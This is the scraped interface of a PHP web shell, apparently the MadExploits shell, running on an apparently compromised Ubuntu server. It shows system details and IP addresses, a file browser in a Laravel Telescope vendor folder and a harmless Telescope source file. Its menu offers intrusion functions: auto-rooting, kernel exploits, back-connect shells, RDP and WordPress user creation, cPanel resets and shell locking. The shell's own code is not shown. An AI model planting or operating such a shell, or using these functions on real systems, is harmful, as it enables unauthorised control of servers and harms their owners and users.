Linux 5474007-topit 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Apache/2.4.52 (Ubuntu)
: 85.198.82.39 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
8.3.30
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
back /
vendor /
laravel /
telescope /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Actions
[ DIR ]
drwxr-xr-x
Console
[ DIR ]
drwxr-xr-x
Contracts
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Jobs
[ DIR ]
drwxr-xr-x
Storage
[ DIR ]
drwxr-xr-x
Watchers
[ DIR ]
drwxr-xr-x
AuthorizesRequests.php
817
B
-rw-r--r--
Avatar.php
1.2
KB
-rw-r--r--
EntryResult.php
2.8
KB
-rw-r--r--
EntryType.php
713
B
-rw-r--r--
EntryUpdate.php
1.91
KB
-rw-r--r--
ExceptionContext.php
1.25
KB
-rw-r--r--
ExtractProperties.php
1.51
KB
-rw-r--r--
ExtractTags.php
4.88
KB
-rw-r--r--
ExtractsMailableTags.php
856
B
-rw-r--r--
FormatModel.php
842
B
-rw-r--r--
IncomingDumpEntry.php
1.45
KB
-rw-r--r--
IncomingEntry.php
6.78
KB
-rw-r--r--
IncomingExceptionEntry.php
1.27
KB
-rw-r--r--
ListensForStorageOpportunities...
3.36
KB
-rw-r--r--
RegistersWatchers.php
1.16
KB
-rw-r--r--
Telescope.php
21.31
KB
-rw-r--r--
TelescopeApplicationServicePro...
1.16
KB
-rw-r--r--
TelescopeServiceProvider.php
4.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AuthorizesRequests.php
<?php namespace Laravel\Telescope; trait AuthorizesRequests { /** * The callback that should be used to authenticate Telescope users. * * @var \Closure */ public static $authUsing; /** * Register the Telescope authentication callback. * * @param \Closure $callback * @return static */ public static function auth($callback) { static::$authUsing = $callback; return new static; } /** * Determine if the given request can access the Telescope dashboard. * * @param \Illuminate\Http\Request $request * @return bool */ public static function check($request) { return (static::$authUsing ?: function () { return app()->environment('local'); })($request); } }
Close